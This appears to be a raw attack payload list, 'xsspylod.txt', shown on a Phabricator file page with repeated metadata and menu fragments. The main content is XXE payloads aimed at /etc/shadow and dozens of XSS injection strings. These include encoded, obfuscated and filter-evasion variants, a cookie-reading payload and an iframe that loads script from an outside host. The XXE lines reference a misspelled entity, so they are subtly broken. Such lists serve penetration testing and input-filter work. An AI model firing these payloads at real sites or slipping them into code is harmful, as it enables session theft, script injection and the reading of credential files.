	<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo>
	<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo>
	<script>alert('XSS')</script>
	%3cscript%3ealert('XSS')%3c/script%3e
	%22%3e%3cscript%3ealert('XSS')%3c/script%3e
	<IMG SRC="javascript:alert('XSS');">
	<IMG SRC=javascript:alert(&quot;XSS&quot;)>
	<IMG SRC=javascript:alert('XSS')>
	<img src=xss onerror=alert(1)>
	<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
	<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
	<IMG SRC="jav ascript:alert('XSS');">
	<IMG SRC="jav&#x09;ascript:alert('XSS');">
	<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
	<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
	<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
	<BODY BACKGROUND="javascript:alert('XSS')">
	<BODY ONLOAD=alert('XSS')>
	<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
	<IMG SRC="javascript:alert('XSS')"
	<iframe src=http://ha.ckers.org/scriptlet.html <
	<<SCRIPT>alert("XSS");//<</SCRIPT>
	%253cscript%253ealert(1)%253c/script%253e
	"><s"%2b"cript>alert(document.cookie)</script>
	foo<script>alert(1)</script>
	<scr<script>ipt>alert(1)</scr</script>ipt>
	<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
	';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
	<marquee onstart='javascript:alert('1');'>=(◕_◕)= </a> </a> </li></ul> </li></ul></b> </blockquote> </li></ul></a> </li></ul></b>
	</body>
	</html>

File Metadata

Mime Type: application/octet-stream
Storage Engine: amazon-s3
Storage Format: Raw Data
Storage Handle: phabricator/admin/x4/wn/ovzqd5zrfmfylasn
Default Alt Text: xsspylod.txt (118 KB)

xsspylod.txtalyasyo (alyas jhon)Actions

xsspylod.txtView Options

File Metadata

Event Timeline

xsspylod.txt
alyasyo (alyas jhon)
Actions

xsspylod.txt
View Options